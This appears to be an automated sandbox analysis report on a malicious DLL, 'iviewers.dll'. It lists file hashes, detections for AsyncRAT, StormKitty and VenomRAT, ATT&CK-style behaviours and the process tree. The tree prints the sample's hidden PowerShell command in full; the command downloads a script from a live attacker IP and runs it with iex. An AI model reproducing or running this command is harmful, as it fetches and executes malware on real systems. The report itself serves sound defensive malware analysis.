Analysis
-
max time kernel
96s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 18:16
Static task
static1
Behavioral task
behavioral1
Sample
iviewers.dll
Resource
win7-20240903-en
General
-
Target
iviewers.dll
-
Size
88KB
-
MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8
-
SHA1
109e32187254b27e04ef18bbe1b48fad42bca841
-
SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
-
SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
SSDEEP
1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/1980-40-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
resource yara_rule behavioral2/memory/1980-40-0x0000000000400000-0x0000000000704000-memory.dmp VenomRAT -
Venomrat family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 4720 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4720 powershell.exe -
Downloads MZ/PE file
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4720 set thread context of 1980 4720 powershell.exe 107 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4720 powershell.exe 4720 powershell.exe 4720 powershell.exe 4720 powershell.exe 1980 RegAsm.exe 1980 RegAsm.exe 1980 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 1980 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1980 RegAsm.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1360 wrote to memory of 4316 1360 regsvr32.exe 83 PID 1360 wrote to memory of 4316 1360 regsvr32.exe 83 PID 1360 wrote to memory of 4316 1360 regsvr32.exe 83 PID 4316 wrote to memory of 4868 4316 regsvr32.exe 84 PID 4316 wrote to memory of 4868 4316 regsvr32.exe 84 PID 4316 wrote to memory of 4868 4316 regsvr32.exe 84 PID 4868 wrote to memory of 4720 4868 cmd.exe 86 PID 4868 wrote to memory of 4720 4868 cmd.exe 86 PID 4868 wrote to memory of 4720 4868 cmd.exe 86 PID 4720 wrote to memory of 2924 4720 powershell.exe 88 PID 4720 wrote to memory of 2924 4720 powershell.exe 88 PID 4720 wrote to memory of 2924 4720 powershell.exe 88 PID 2924 wrote to memory of 1212 2924 csc.exe 89 PID 2924 wrote to memory of 1212 2924 csc.exe 89 PID 2924 wrote to memory of 1212 2924 csc.exe 89 PID 4720 wrote to memory of 1800 4720 powershell.exe 106 PID 4720 wrote to memory of 1800 4720 powershell.exe 106 PID 4720 wrote to memory of 1800 4720 powershell.exe 106 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107 PID 4720 wrote to memory of 1980 4720 powershell.exe 107
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ylsq5aws\ylsq5aws.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6B6.tmp" "c:\Users\Admin\AppData\Local\Temp\ylsq5aws\CSCA4C195AEA4AD4282B27C5238C2F6E6C.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:1212
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:1800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1980
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD501c69299290780254ae39220a0c156ef
SHA15337c72843cc46d052cb696a3348737d617c33e1
SHA256db82c28d11b6cc87a63810aa383e461b3ed490d1098ac47d872c5cc0fa97c312
SHA5121ec34a9bf61c876cce16a6339b8b03ed1ce63c811f97364840eb3a9fdce512abf0b882225a82b43c0a38015f3f04ceae2ac7cf37b06ee0708431d7756c74d304
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD55555cc83e90608cb8d0acadbbefc8e07
SHA16e3bb6ac1fd1c9711e3b34a6e8fb2f936decc78b
SHA2562fc4fd7bab8376b04517587a4121e98d434b5aa2e8442b8c5ec8077f568bc32e
SHA51227c45660b9bbe43b206d917b068674b3c57de134a9742530262d18b41a8cca700bb16b3d9ce8e6c6c0241279019b15a35b2bf7207d527603d68f9f8cd50046da
-
Filesize
652B
MD5b9b773126c0858fc6c68fc114b582373
SHA19188b1fbe50f620857f7174b4de75b2dc376db3b
SHA256447ad9f48aa4f8bd9205767a359e20d4aa1b263223918e9fe2e5ecaf8d4fb3a3
SHA512aa732453c83d9e94b231e68cbc9faf2f682e60b628e2fa5c3fcf7331b07639fb9102fd6a3edb0ee32e8a6bd7d67b6101b899689d0efb671d65c9aed7240a2687
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD51d3a3cea1694a209a5091488e1210a7d
SHA1a7f97fb55d145190dd71a596fec8e981378c8cbe
SHA2561d1a6830c0be8777ed197dfc636fd5ae857f31fa1e0773801aa74f80456f223a
SHA5122ccbeaa51188e78ccb68a9e7b578e41169d51a3be7cf62fbdd93f2c7a119b1bac0d849b8649715a9ccd3b8c0ea451ed4d7fe790919c2be43de9a7a5d9de787e8